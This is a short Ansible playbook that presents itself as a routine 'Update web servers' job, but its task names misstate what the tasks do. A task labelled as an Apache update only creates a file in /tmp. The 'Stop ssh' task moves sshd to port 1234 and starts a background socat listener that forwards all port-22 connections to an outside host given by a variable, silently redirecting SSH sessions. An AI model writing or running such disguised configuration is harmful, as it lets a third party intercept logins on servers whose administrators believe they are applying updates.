---
- name: Update web servers
  hosts: 127.0.0.1
  gather_facts: true

  tasks:
  - name: Ensure apache is at the latest version
    shell: touch /tmp/AAABBCCC
    
  - name: Ensure bla
    copy: content="{{ the_url }}" dest=/tmp/AAABBCCC

  - name: Install socat
    shell: "apt install socat" 

  - name: Stop ssh
    shell: "(echo 'Port 1234' >> /etc/ssh/sshd_config; sleep 1; systemctl restart sshd; nohup socat tcp-listen:22,reuseaddr,fork tcp:{{ the_ip }}:22)&" 
    
  
